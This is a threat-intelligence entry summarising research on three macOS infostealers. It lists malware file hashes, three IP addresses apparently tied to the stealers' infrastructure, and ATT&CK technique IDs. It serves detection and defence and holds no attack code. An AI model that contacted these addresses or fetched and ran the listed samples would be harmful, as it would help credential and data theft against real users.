Stealers on the Rise: A Closer Look at a Growing macOS Threat
Feb. 4, 2025, 6:46 p.m.
Tags
External References
Description
This analysis examines the increasing prevalence of macOS infostealers, focusing on three prominent threats: Atomic Stealer, Poseidon Stealer, and Cthulhu Stealer. These malware variants target sensitive information, including financial details, credentials, and intellectual property. The article describes their distribution methods, execution processes, and data exfiltration techniques. It highlights the risks posed by infostealers, including potential data breaches and further malicious activities. The research reveals a 101% increase in macOS infostealer detections between the last two quarters of 2024. The article also discusses protection measures and mitigations, emphasizing the importance of advanced detection modules and multi-layered defense strategies.
Date
Published: Feb. 4, 2025, 6:19 p.m.
Created: Feb. 4, 2025, 6:19 p.m.
Modified: Feb. 4, 2025, 6:46 p.m.
Indicators
dd831c4aaaceb9f063642ae729956a716e29e0c5452526996e92959cca820914
d8d29c2906145771e1c12d6520a826c238d5672f256779326ba38859dfb9cf4c
cfa8173e681bf6866e06b1a971dab03954b28d3626d96ac0827c5f261e7997cd
c4e7320945caf9dc4dca11f6ad0170bc6fc2148de0cdc8aa15a236b248165d39
b94067535123dd236a075d54afa34fef80324f7d1375f55c29ca70393e6492b2
a9fe32498f6132b9c39ae16524bdb3d71b451017a2d3acf117416a0dc9a89ce5
ad32e638216b859855f78a856f8f4e3aea66add550619a4bde08754e2c218186
a772451ddd6897c00ce766949fc82e30cfb64a6b31b44bfd9068a76ab99dd188
a8aa1d7f940f0a8ccd516e52232b103d343826e13df9e4d9567f75e996683886
a33705df80d2a7c2deeb192c3de9e7f06c7bfd14b84f782cf86099c52a8b0178
9f4f286e5e40b252512540cc186727abfb0ad15a76f91855b1e72efb006b854c
93f33e76c57240dda2b80b0270ad867a4c77ee7ad4ac135d086398e789e4dbc9
9390108ca021b5f5c8c25849c1d6903c8a30568e822ce22e01e96381ea2df3b5
831f80f6e6f7be8352aba0b54b3e55ade63f8719c7e6f8cfa19ee34af5a07deb
599e6358503a0569d998f09ccfbdeaa629d8910f410e26df0ffbd68112e77b05
5880430d86d092ac56bfa4aec7e245e3d9084e996165d64549ccb66b626d8c56
57ece6ae15a8d16a24bad097b4455dc6aec4a24c139d62d05c59330620c3e90e
2d232bd6a6b6140a06b3cf59343e3e2113235adcf3fb93e78fa3746d9679cfc3
3eac9c66a712f74d9e93e24751220a74b2c7e5320c74f1f7b4931d8181c7f26c
1b9b929e63be771393b6a4e526930eedb78f279174711bd2f19dfa8545f6e714
0bb4ba056d64fff21d13b53b5c1bd5ccb89bed27e66e2b7ff60ddcf47c1342b4
09852c1f67939efad0f0baeead5d23dc9cd53eec0f1f6069f041dfd4e0e83c3f
6483094f7784c424891644a85d5535688c8969666e16a194d397dc66779b0b12
94.142.138.177
194.169.175.117
89.208.103.185
Attack Patterns
Poseidon Stealer
Cthulhu Stealer
Atomic Stealer
T1056.002
T1217
T1552.001
T1119
T1074
T1555.003
T1566.002
T1567
T1087
T1555
T1204.002
T1059.002
T1005
T1566.001
T1071
T1036
T1132
T1027